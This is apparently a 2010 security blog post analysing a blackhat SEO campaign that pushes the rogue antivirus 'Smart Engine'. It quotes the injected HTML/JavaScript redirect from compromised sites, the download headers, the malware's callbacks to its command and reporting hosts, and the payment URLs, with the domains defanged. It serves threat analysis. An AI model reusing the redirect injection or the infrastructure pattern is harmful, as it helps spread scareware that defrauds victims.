BlackHat SEO Campaign used to spread Smart Engine

Posted by admin on Saturday, October 9th, 2010 | 5,518 views

A new blackhat seo campaign is distributing the setup installer of the new rogue security software named Smart Engine. The spreading status looks like to be pretty aggressive, we have logged more than 2000 infected websites that are used to capture popular keywords and to redirect users to malicious urls or other fake scanner pages, with the intent to install the rogue software installer.

When an user clicks on an infected url, there is a redirection:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

www4.get-bestlink3 .co.cc
209.212.149.22 – ip-209.212.149.22.servernap.net

Another redirection:

HTTP/1.1 302 Moved Temporarily
Location: hxxp://www2.best-install10 .co.cc/?p=XXX

Domain & IP Analysis:

www2.best-install10 .co.cc
212.117.168.150 – ip-212-117-168-150.server.lu

And now we can see the fake scanner page:

Fake Scanner Page

After few times, it is prompted the download of an executable:

Executable File Download

Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX

HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

Domain & IP Analysis:

www2.doit-nowandfast .net
188.65.74.86 – -

The downloaded file is the installer of the Smart Engine rogue security software:

Smart Engine Installer

Main GUI of Smart Engine:

Smart Engine GUI

Smart Engine main executable is trying to connect to a remote host:

Windows Firewall Alert

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910 .net
 
GET /?0d40b0=XXX HTTP/1.0
Host: report1.liwnarwlentoristorg910 .net

DNS Queries:

www5.smart-engine .net
secure1.buy-the-guardian .com

Domain & IP Analysis:

update1.liwnarwlentoristorg910 .net
188.65.74.83 – -
report1.liwnarwlentoristorg910 .net
209.222.8.102 – 209.222.8.102.choopa.net

Activation page:

Smart Engine Activation Page

GET /?kp=kdTHxeevuH5zneDK4eiso1Pk28WhmJI%3D HTTP/1.1
Host: secure1.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

secure1.wlentor-traden-quzonk-1 .com
69.57.173.219 – -

Smart Engine is sold for:

$49.95 -> 6 Month Guard Subscription
$69.95 -> 1 Year Guard Subscription
$89.95 -> Lifetime Guard Subscription

Network traffic:

HEAD / HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: report1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: www5.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

update1.wlentor-traden-quzonk-1 .com
173.244.223.32 – 173.244.223.32.static.midphase.com
report1.wlentor-traden-quzonk-1 .com
173.244.223.37 – 173.244.223.37.static.midphase.com
www5.wlentor-traden-quzonk-1 .com
69.57.173.221 – -

The subdomain used for the activation page changed few IPs during the analysis:

09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219

Network traffic:

GET /?xohmdu=XXX HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com

Content-Type: application/octetstream
Pragma: hack
Content-Length: 1307
Content-Disposition: attachment; filename=04869.ini
Content-Transfer-Encoding: binary

GET /?pg=XXX HTTP/1.1
Host: report1.wlentor-traden-quzonk671 .com

Domain & IP Analysis:

report1.wlentor-traden-quzonk671 .com
174.36.42.71 – amu.furumoon.net

The subdomain changed few IPs during the analysis:

09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100

DNS Queries:

.............cilt442vyabkqqv.com.....
.............cilt442vyabkqqv.com.....À........D.&%v=spf1 a mx ip4:209.222.8.100/22 ?all

The malware queried an external url to get our remote IP:

GET /get_ip.php?loc= HTTP/1.1
Host: www.myip .ru

After few time, we noticed a connections loop:

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

It looks like it tried to connect to google IP to see if the victim is online.

New domain used for payments, note the HTTPS:

Location: hxxps://secure.onlinesystempayment .com/?abbr=SME&price_name=6month&ext3=2211&ext1=MD5HASH&ext2=wvXP;b_IE6;107;11111;MainWindow;day;671;1;0&card=visa

Domain & IP Analysis:

secure.onlinesystempayment .com
209.212.149.23 – ip-209.212.149.23.servernap.net

New connection on port 443:

Remote Address    : 96.9.160.110
Remote Port       : 443
Service Name      : https

IP Analysis:

96.9.160.110 – 96-9-160-110.hostnoc.net

The malware queried also a legit website related to SSL certificates:

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com

Files created during the installation of the rogue security software:

Files Created

Created desktop icon:

Desktop Icon

Smart Engine installed files:

Smart Engine Files

The hosts file has been modified and it has now +S (System) attribute:

Hosts File System Attribute

Hosts file content:

Hosts File Content

Posted by admin on Saturday, October 9th, 2010 at 3:46 pm and filed under Security with tags blackhat seo, dangerous urls, hacked websites, rogue software. Both comments and pings are currently closed.

Random Posts

Comments are closed.

BlackHat SEO Campaign used to spread Smart Engine

Random Posts

Previous Posts

Search

Categories

Recent

Products